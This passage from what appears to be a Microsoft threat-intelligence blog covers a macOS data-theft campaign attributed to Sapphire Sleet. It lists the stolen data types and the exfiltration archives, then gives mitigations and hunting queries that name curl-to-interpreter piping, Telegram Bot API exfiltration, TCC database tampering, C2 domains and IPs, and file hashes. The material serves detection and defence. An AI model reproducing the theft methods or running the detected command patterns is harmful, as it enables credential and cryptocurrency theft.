Messaging session data (Telegram): Telegram Desktop session data is collected by copying the application’s data directories, including cryptographic key material and session mapping files. These artifacts are sufficient to recreate the user’s Telegram session on another system without requiring reauthentication. A second collection pass targets the Telegram App Group container to capture the complete local data set associated with the application.
Browser data and extension storage: For Chromium‑based browsers, including Chrome, Brave, and Arc, the script copies browser profiles and associated databases. This includes saved credentials, cookies, autofill data, browsing history, bookmarks, and extension‑specific storage. Particular focus is placed on IndexedDB entries associated with cryptocurrency wallet extensions, where wallet keys and transaction data are stored. Only IndexedDB entries matching a targeted set of wallet extension identifiers are collected, reflecting a deliberate and selective approach.
macOS keychain: The user’s sign-in keychain database is bundled alongside browser data. Although the keychain is encrypted, Sapphire Sleet has already captured the user’s password earlier in the attack chain, enabling offline decryption of stored secrets once exfiltrated.
Cryptocurrency desktop wallets: The script copies the full application support directories for popular cryptocurrency desktop wallets, including Ledger Live and Exodus. These directories contain wallet configuration files and key material required to access stored cryptocurrency assets, making them high‑value targets for exfiltration.
SSH keys and shell history: SSH key directories and shell history files are collected to enable potential lateral movement and intelligence gathering. SSH keys may provide access to additional systems, while shell history can reveal infrastructure details, previously accessed hosts, and operational habits of the targeted user.
Apple Notes: The Apple Notes database is copied from its application container and staged for upload. Notes frequently contain sensitive information such as passwords, internal documentation, infrastructure details, or meeting notes, making them a valuable secondary data source.
System logs and failed access attempts: System log files are uploaded directly without compression. These logs provide additional hardware and execution context and include progress markers that indicate which exfiltration stages have completed. Failed collection attempts—such as access to password manager containers that are not present on the system—are also recorded and uploaded, allowing Sapphire Sleet to understand which targets were unavailable on the compromised host.
Exfiltration summary
| # | Data category | ZIP name | Upload port | Estimated sensitivity |
|---|---------------|----------|-------------|-----------------------|
| 1 | Telegram session | tapp_&lt;user&gt;.zip | 8443 | Critical — session hijack |
| 2 | Browser data + Keychain | ext_&lt;user&gt;.zip | 8443 | Critical — all passwords |
| 3 | Ledger wallet | ldg_&lt;user&gt;.zip | 8443 | Critical — crypto keys |
| 4 | Exodus wallet | exds_&lt;user&gt;.zip | 8443 | Critical — crypto keys |
| 5 | SSH + shell history | hs_&lt;user&gt;.zip | 8443 | High — lateral movement |
| 6 | Apple Notes | nt_&lt;user&gt;.zip | 8443 | Medium-High |
| 7 | System log | lg_&lt;user&gt; (no zip) | 8443 | Low — fingerprinting |
| 8 | Recon log | flog (no zip) | 8443 | Low — inventory |
| 9 | Credentials | Telegram message | 443 (Telegram API) | Critical — sign-in password |
All uploads use the upload authorization token fwyan48umt1vimwqcqvhdd9u72a7qysi and the machine identifier 82cf5d92-87b5-4144-9a4e-6b58b714d599.
Defending against Sapphire Sleet intrusion activity
As part of a coordinated response to this activity, Apple has implemented platform-level protections to help detect and block the infrastructure and malware associated with this campaign. Apple Safe Browsing protections in Safari detect and block the campaign’s malicious infrastructure, and users browsing with Safari benefit from these protections by default. Apple has also deployed XProtect signatures to detect and block the associated malware families; macOS devices receive these signature updates automatically.
Microsoft recommends the following mitigation steps to defend against this activity and reduce the impact of this threat:
Educate users about social engineering threats originating from social media and external platforms, particularly unsolicited outreach requesting software downloads, virtual meeting tool installations, or execution of terminal commands. Users should never run scripts or commands shared through messages, calls, or chats without prior approval from their IT or security teams.
Block or restrict the execution of .scpt (compiled AppleScript) files and unsigned Mach-O binaries downloaded from the internet. Where feasible, enforce policies that prevent osascript from executing scripts sourced from external locations.
Always inspect and verify files downloaded from external sources, including compiled AppleScript (.scpt) files. These files can execute arbitrary shell commands via macOS Script Editor—a trusted first-party Apple application—making them an effective and stealthy initial access vector.
Limit or audit the use of curl piped to interpreters (such as curl | osascript, curl | sh, curl | bash). Social engineering campaigns by Sapphire Sleet rely on cascading curl-to-interpreter chains to avoid writing payloads to disk. Organizations should monitor for and restrict piped execution patterns originating from non-standard user-agent strings.
Exercise caution when copying and pasting sensitive data such as wallet addresses or credentials from the clipboard. Always verify that the pasted content matches the intended source to avoid falling victim to clipboard hijacking or data tampering attacks.
Monitor for unauthorized modifications to the macOS TCC database. This campaign manipulates TCC.db to grant AppleEvents permissions to osascript without user consent—a prerequisite for the large-scale data exfiltration phase. Look for processes copying, modifying, or overwriting ~/Library/Application Support/com.apple.TCC/TCC.db.
Audit LaunchDaemon and LaunchAgent installations. This campaign installs a persistent launch daemon (com.google.webkit.service.plist) that masquerades as a legitimate Google or Apple service. Monitor /Library/LaunchDaemons/ and ~/Library/LaunchAgents/ for unexpected plist files, particularly those with com.google.* or com.apple.* naming conventions not belonging to genuine vendor software.
Protect cryptocurrency wallets and browser credential stores. This campaign targets specific cryptocurrency wallet extensions (including Sui, Phantom, TronLink, Coinbase, OKX, Solflare, Rabby, and Backpack) plus Bitwarden, and exfiltrates browser sign-in data, cookies, and keychain databases. Organizations handling digital assets should enforce hardware wallet policies and rotate browser-stored credentials regularly.
Encourage users to use web browsers that support Microsoft Defender SmartScreen like Microsoft Edge—available on macOS and various platforms—which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.
Microsoft Defender for Endpoint customers can also apply the following mitigations to reduce the environmental attack surface and mitigate the impact of this threat and its payloads:
Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
Enable potentially unwanted application (PUA) protection in block mode to automatically quarantine PUAs like adware. PUA blocking takes effect on endpoint clients after the next signature update or computer restart.
Turn on network protection to block connections to malicious domains and IP addresses.
Microsoft Defender detection and hunting guidance
Microsoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Microsoft Defender for Endpoint
– Enumeration of files with sensitive data
– Suspicious File Copy Operations Using CoreUtil
– Suspicious archive creation
– Remote exfiltration activity
– Possible exfiltration of archived data
Command and control
– Mach-O backdoors beaconing to C2 (com.apple.cli, services, com.google.chromes.updaters)
Microsoft Defender Antivirus
– Trojan:MacOS/NukeSped.D
– Backdoor:MacOS/FlowOffset.B!dha
– Backdoor:MacOS/FlowOffset.C!dha
Microsoft Security Copilot is embedded in Microsoft Defender and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.
Security Copilot is also available as a standalone experience where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers developer scenarios that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.
Threat intelligence reports
Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following advanced hunting queries to find related activity in their networks:
Suspicious osascript execution with curl piping
Search for curl commands piping output directly to osascript, a core technique in this Sapphire Sleet campaign’s cascading payload delivery chain.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName == "osascript" or InitiatingProcessFileName == "osascript"
| where ProcessCommandLine has "curl" and ProcessCommandLine has_any ("osascript", "| sh", "| bash")
| project Timestamp, DeviceId, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessFileName
Suspicious curl activity with campaign user-agent strings
Search for curl commands using user-agent strings matching the Sapphire Sleet campaign tracking identifiers (mac-cur1 through mac-cur5, audio, beacon).
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName == "curl" or ProcessCommandLine has "curl"
| where ProcessCommandLine has_any ("mac-cur1", "mac-cur2", "mac-cur3", "mac-cur4", "mac-cur5", "-A audio", "-A beacon")
| project Timestamp, DeviceId, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
Detect connectivity with known C2 infrastructure
Search for network connections to the Sapphire Sleet C2 domains and IP addresses used in this campaign.
let c2_domains = dynamic(["uw04webzoom.us", "uw05webzoom.us", "uw03webzoom.us", "ur01webzoom.us", "uv01webzoom.us", "uv03webzoom.us", "uv04webzoom.us", "ux06webzoom.us", "check02id.com"]);
let c2_ips = dynamic(["188.227.196.252", "83.136.208.246", "83.136.209.22", "83.136.208.48", "83.136.210.180", "104.145.210.107"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (c2_domains) or RemoteIP in (c2_ips)
| project Timestamp, DeviceId, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
TCC database manipulation detection
Search for processes that copy, modify, or overwrite the macOS TCC database, a key defense evasion technique used by this campaign to grant unauthorized AppleEvents permissions.
DeviceFileEvents
| where Timestamp > ago(30d)
| where FolderPath has "com.apple.TCC" and FileName == "TCC.db"
| where ActionType in ("FileCreated", "FileModified", "FileRenamed")
| project Timestamp, DeviceId, DeviceName, ActionType, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
Suspicious LaunchDaemon creation masquerading as legitimate services
Search for LaunchDaemon plist files created in /Library/LaunchDaemons that masquerade as Google or Apple services, matching the persistence technique used by the services/icloudz backdoor.
DeviceFileEvents
| where Timestamp > ago(30d)
| where FolderPath startswith "/Library/LaunchDaemons/"
| where FileName startswith "com.google." or FileName startswith "com.apple."
| where ActionType == "FileCreated"
| project Timestamp, DeviceId, DeviceName, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, SHA256
Malicious binary execution from suspicious paths
Search for execution of binaries from paths commonly used by Sapphire Sleet, including hidden Library directories, /private/tmp/, and user-specific Application Support folders.
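The following sketch covers the deployment paths and file names documented earlier in this post; expand both lists to match your environment and reduce false positives from legitimate software in these directories.

```kusto
// Hunt for execution of binaries from the staging and deployment
// locations used in this campaign, or of the specific backdoor
// file names described in this report.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FolderPath has_any (
        "Library/Application Support/iCloud",
        "Library/Google",
        "Library/Application Support/Authorization",
        "/private/tmp/")
    or FileName in (".services", "icloudz", "com.google.chromes.updaters", "com.apple.cli")
| project Timestamp, DeviceId, DeviceName, AccountName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName
```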
Credential harvesting using dscl authentication check
Search for dscl -authonly commands used by the fake password dialog (systemupdate.app) to validate stolen credentials before exfiltration.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName == "dscl" or ProcessCommandLine has "dscl"
| where ProcessCommandLine has "-authonly"
| project Timestamp, DeviceId, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
Telegram Bot API exfiltration detection
Search for network connections to Telegram Bot API endpoints, used by this campaign to exfiltrate stolen credentials.
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has "api.telegram.org" and RemoteUrl has "/bot"
| project Timestamp, DeviceId, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
Reflective code loading using NSCreateObjectFileImageFromMemory
Search for evidence of reflective Mach-O loading, the technique used by the icloudz backdoor to execute code in memory.
DeviceEvents
| where Timestamp > ago(30d)
| where ActionType has "NSCreateObjectFileImageFromMemory"
or AdditionalFields has "NSCreateObjectFileImageFromMemory"
| project Timestamp, DeviceId, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName, AdditionalFields
Suspicious caffeinate and sleep prevention activity
Search for caffeinate process stop-and-restart patterns used by the services and icloudz backdoors to prevent the system from sleeping during backdoor operations.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where ProcessCommandLine has "caffeinate"
| where InitiatingProcessCommandLine has_any ("icloudz", "services", "chromes.updaters", "zsh -i")
| project Timestamp, DeviceId, DeviceName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
Detect known malicious file hashes
Search for the specific malicious file hashes associated with this Sapphire Sleet campaign across file events.
let malicious_hashes = dynamic([
"2075fd1a1362d188290910a8c55cf30c11ed5955c04af410c481410f538da419",
"05e1761b535537287e7b72d103a29c4453742725600f59a34a4831eafc0b8e53",
"5fbbca2d72840feb86b6ef8a1abb4fe2f225d84228a714391673be2719c73ac7",
"5e581f22f56883ee13358f73fabab00fcf9313a053210eb12ac18e66098346e5",
"95e893e7cdde19d7d16ff5a5074d0b369abd31c1a30962656133caa8153e8d63",
"8fd5b8db10458ace7e4ed335eb0c66527e1928ad87a3c688595804f72b205e8c",
"a05400000843fbad6b28d2b76fc201c3d415a72d88d8dc548fafd8bae073c640"
]);
DeviceFileEvents
| where Timestamp > ago(30d)
| where SHA256 in (malicious_hashes)
| project Timestamp, DeviceId, DeviceName, FileName, FolderPath, SHA256, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
Data staging and exfiltration activity
Search for ZIP archive creation in /tmp/ directories followed by curl uploads matching the staging-and-exfiltration pattern used for browser data, crypto wallets, Telegram sessions, SSH keys, and Apple Notes.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where (ProcessCommandLine has "zip" and ProcessCommandLine has "/tmp/")
or (ProcessCommandLine has "curl" and ProcessCommandLine has_any ("tapp_", "ext_", "ldg_", "exds_", "hs_", "nt_", "lg_"))
| project Timestamp, DeviceId, DeviceName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
Script Editor spawning command interpreters
Search for Script Editor (the default handler for .scpt files) spawning curl, osascript, or shell commands—the initial execution vector in this campaign.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where InitiatingProcessFileName == "Script Editor" or InitiatingProcessCommandLine has "Script Editor"
| where FileName has_any ("curl", "osascript", "sh", "bash", "zsh")
| project Timestamp, DeviceId, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Detect network indicators of compromise
The following query checks for connections to the Sapphire Sleet C2 domains and IP addresses across network session data:
let lookback = 30d;
let ioc_domains = dynamic(["uw04webzoom.us", "uw05webzoom.us", "uw03webzoom.us", "ur01webzoom.us", "uv01webzoom.us", "uv03webzoom.us", "uv04webzoom.us", "ux06webzoom.us", "check02id.com"]);
let ioc_ips = dynamic(["188.227.196.252", "83.136.208.246", "83.136.209.22", "83.136.208.48", "83.136.210.180", "104.145.210.107"]);
DeviceNetworkEvents
| where TimeGenerated > ago(lookback)
| where RemoteUrl has_any (ioc_domains) or RemoteIP in (ioc_ips)
| summarize EventCount=count() by DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName
Detect file hash indicators of compromise
The following query searches for the known malicious file hashes associated with this campaign across file, process, and security event data:
let selectedTimestamp = datetime(2026-01-01T00:00:00.0000000Z);
let FileSHA256 = dynamic([
"2075fd1a1362d188290910a8c55cf30c11ed5955c04af410c481410f538da419",
"05e1761b535537287e7b72d103a29c4453742725600f59a34a4831eafc0b8e53",
"5fbbca2d72840feb86b6ef8a1abb4fe2f225d84228a714391673be2719c73ac7",
"5e581f22f56883ee13358f73fabab00fcf9313a053210eb12ac18e66098346e5",
"95e893e7cdde19d7d16ff5a5074d0b369abd31c1a30962656133caa8153e8d63",
"8fd5b8db10458ace7e4ed335eb0c66527e1928ad87a3c688595804f72b205e8c",
"a05400000843fbad6b28d2b76fc201c3d415a72d88d8dc548fafd8bae073c640"
]);
search in (AlertEvidence, DeviceEvents, DeviceFileEvents, DeviceImageLoadEvents, DeviceProcessEvents, DeviceNetworkEvents, SecurityEvent, ThreatIntelligenceIndicator)
TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d))
and (SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256))
Detect Microsoft Defender Antivirus detections related to Sapphire Sleet
The following query searches for Defender Antivirus alerts for the specific malware families used in this campaign and joins with device information for enriched context:
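A sketch of such a query is below. It uses the AlertEvidence and AlertInfo tables available through the Microsoft Defender XDR connector; the column names and join shape are assumptions and may need adjustment for your workspace.

```kusto
// Find Defender Antivirus alerts for the malware families used in
// this campaign and enrich them with device context.
AlertEvidence
| where TimeGenerated > ago(30d)
| where ThreatFamily has_any ("NukeSped", "FlowOffset")
| join kind=inner (
    AlertInfo
    | project AlertId, Title, Severity, Category
) on AlertId
| project TimeGenerated, AlertId, Title, Severity, Category, ThreatFamily, DeviceId, DeviceName, SHA256
```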
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.